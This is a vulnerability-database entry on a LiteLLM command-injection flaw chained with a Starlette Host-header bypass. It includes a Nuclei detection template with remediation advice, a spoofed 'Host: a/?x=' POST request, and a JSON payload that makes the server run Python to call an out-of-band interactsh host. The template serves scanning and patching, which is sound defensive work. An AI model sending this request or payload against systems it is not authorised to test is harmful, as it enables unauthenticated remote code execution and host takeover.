| Reporter | Title | Published | Views | Family All 101 |
|---|---|---|---|---|
| Exploit for CVE-2026-48710 | 28 May 202609:57 | – | githubexploit | |
| Exploit for Command Injection in Litellm | 20 May 202601:12 | – | githubexploit | |
| CVE-2026-42271 | 8 May 202603:35 | – | attackerkb | |
| CVE-2026-48710 | 26 May 202621:54 | – | attackerkb | |
| CVE-2026-48710 | 26 May 202621:54 | – | alpinelinux | |
| The vulnerability of the Request Header Handler component of the ASGI framework in web development for Starlette allows attackers to circumvent existing security restrictions. | 28 May 202600:00 | – | bdu_fstec | |
| CVE-2026-42271 vulnerabilities | 6 May 202619:17 | – | cgr | |
| CVE-2026-48710 vulnerabilities | 13 Jun 202601:18 | – | cgr | |
| CVE-2026-42271 | 8 May 202604:40 | – | circl | |
| CVE-2026-48710 | 26 May 202607:49 | – | circl |
id: CVE-2026-42271
info:
name: LiteLLM - Command Injection
author: ritikchaddha
severity: critical
description: |
A critical unauthenticated remote code execution vulnerability exists in LiteLLM due to improper input handling in the MCP stdio test endpoint. An attacker can send a specially crafted request to the `/mcp-rest/test/connection` endpoint with controlled parameters, resulting in arbitrary command execution on the server. When combined with an authentication bypass technique—such as the Starlette BadHost flaw (CVE-2026-48710)—an unauthenticated attacker can exploit the chain to execute commands as the server process. Exploitation allows an attacker to spawn processes with the privileges of the LiteLLM server, potentially leading to complete compromise of the host.
impact: |
Successful exploitation allows unauthenticated remote attackers to execute arbitrary commands on affected LiteLLM instances, potentially leading to full system compromise, lateral movement, data theft, and persistent access.
remediation: |
Upgrade LiteLLM to version 1.83.7 or later to remediate this vulnerability. If immediate patching is not possible, restrict access to the `/mcp-rest/test/connection` endpoint and ensure authentication verification is robust.
reference:
- https://horizon3.ai/attack-research/vulnerabilities/cve-2026-42271-chained-with-cve-2026-48710/
- https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g
- https://github.com/BerriAI/litellm/pull/25343
- https://nvd.nist.gov/vuln/detail/CVE-2026-42271
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-42271
epss-score: 0.80188
epss-percentile: 0.9957
cwe-id: CWE-77
metadata:
max-request: 1
vendor: berriai
product: litellm
tags: cve,cve2026,litellm,rce,command-injection,mcp,starlette,kev,vkev
variables:
payload: '{"transport":"stdio","command":"python","args":["-c","import urllib.request;urllib.request.urlopen(''https://{{interactsh-url}}'')"]}'
http:
- raw:
- |
POST /mcp-rest/test/connection HTTP/1.1
Host: a/?x=
Content-Type: application/json
Content-Length: {{len(payload)}}
{{payload}}
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Failed to connect to MCP server"
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"
extractors:
- type: kval
kval:
- interactsh_ip
# digest: 4a0a00473045022100bf58a68b1215250f5a9ad4802a695a2df7f63aa12e06663c9d22b7ed95c4807802206ec4a442e8bd7fa1b3528a98dac89e17f5dd654dd4059f745b7ee829009859ea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation